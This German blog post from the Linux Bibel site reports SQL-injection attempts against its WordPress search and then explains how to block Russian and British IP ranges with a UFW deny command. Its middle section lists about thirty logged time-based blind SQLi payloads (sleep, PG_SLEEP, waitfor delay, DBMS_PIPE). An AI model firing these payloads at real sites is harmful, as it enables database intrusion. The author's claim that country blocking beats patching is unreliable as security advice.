Nun, die Linux Bibel ist recht bekannt – also auch ein Server, der gerne angegriffen wird. Der Server, also das Betriebssystem, ist inzwischen exzellent abgesichert – ein Problem ist natürlich noch immer – die Datenbank. WordPress hat eine Suche – diese funktioniert natürlich mit PHP, mit PHP greift die Suche wieder auf die Datenbank zu.
Ein Problem dabei – hat die Datenbank eine Sicherheitslücke, die noch nicht gefixt wurde – kann man mit den passenden PHP-Befehlen auf diese zugreifen und etwa auch, wenn eine Sicherheitslücke ausgenutzt werden kann, diese übernehmen. Diese Geschichte nennt man SQL-Injection. Hier einige Beispiele, die auf der Linux Bibel nicht ausgenutzt werden konnten:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*' (select(0)from(select(sleep(15)))v) '" (select(0)from(select(sleep(15)))v) "*/
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1ˤˢ'"
the'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
the-1 waitfor delay '0:0:15' -
the/page'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
the0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
the0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-1 OR 2 31-31-1=0 0 0 1 --
-1 OR 2 83-83-1=0 0 0 1 -
-1 OR 2 86-86-1=0 0 0 1 --
-1 OR 2 98-98-1=0 0 0 1 --
-1' OR 2 248-248-1=0 0 0 1 or 'FIzQAb8x'='
-1' OR 2 580-580-1=0 0 0 1 or 'MIRrW8gW'='
-1)) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
0K1ZBbZY') OR 555=(SELECT 555 FROM PG_SLEEP(15))--
0thGeTF9'; waitfor delay '0:0:15' --
1-1 OR 538=(SELECT 538 FROM PG_SLEEP(15))-
1Ri1YZArf') OR 518=(SELECT 518 FROM PG_SLEEP(15))--
30j4vGTy'; waitfor delay '0:0:15' --
@@3auAt
EU6KKJwC' OR 597=(SELECT 597 FROM PG_SLEEP(15))--Funktioniert ein Angriff nicht, bekommt der Angreifer einfach gesagt, nur die Fehlermeldung, dass sein gesuchter Begriff nicht gefunden wurde.
Die meisten Angriffe kommen aus Russland und England, aber auch aus Deutschland gibt es solche – die meisten Angreifer nutzen lustigerweise das anfälligste System überhaupt – Windows. Sehen wir uns einmal ein paar solcher Angreifer näher an (leider habe ich hier in Matomo noch die IP-Adressen auf Anonymität getrimmt, dies mache ich jetzt nicht mehr):
Die einfachste Möglichkeit sich zu schützen ist natürlich, die Software aktuell zu halten – hier könnte man aber noch immer das Pech haben, eine Lücke zu haben, die den Entwicklern nicht bekannt ist – dem Angreifer aber schon – so arbeitet zum Beispiel die israelische NSO Group.
Die weitaus intelligentere Methode – die IP-Adressen, der Länder, aus denen angegriffen wird – einfach sperren. Deutschland zu sperren, wäre natürlich nicht sonderlich erfreulich – aber hier hat es bisher auch nur einen Angreifer gegeben. Also sind Russland und England dran. Die Besucher aus Russland – 454 und England – 288 im Jahr 2024 werden es wohl überleben.
Wie geht man jetzt vor – nehmen wir einfach die Firewall UFW unter Linux (eigentlich ist diese ja nur ein Frontend, mit der man die Iptables / Nftables steuert). Als Erstes benötigen wir die IP-Adressen, die in den Ländern genutzt werden – diese erhält man etwa unter IP2location:
Man wählt das Land und am Ende „CIDR„, klickt auf „Download“ und erhält eine Textdatei. Diese Textdatei benennt man passend um – in meinem Fall etwa „russia.txt“ und lädt diese auf den Server.
Jetzt fügt man die IP-Adressen aus der Datei in die Regeln der Firewall ein, natürlich als root:
cat russia.txt | awk '/^[^#]/ { print $1 }' | xargs -I {} ufw deny from {} to anyGerade bei großen IP-Adressbereichen, wie denen aus Russland, kann dies schon mal eine halbe Stunde dauert – im besten Fall nutzen Sie also etwa Tmux, damit die SSH-Verbindung nicht abbricht.
6
1
Noch keine Reaktion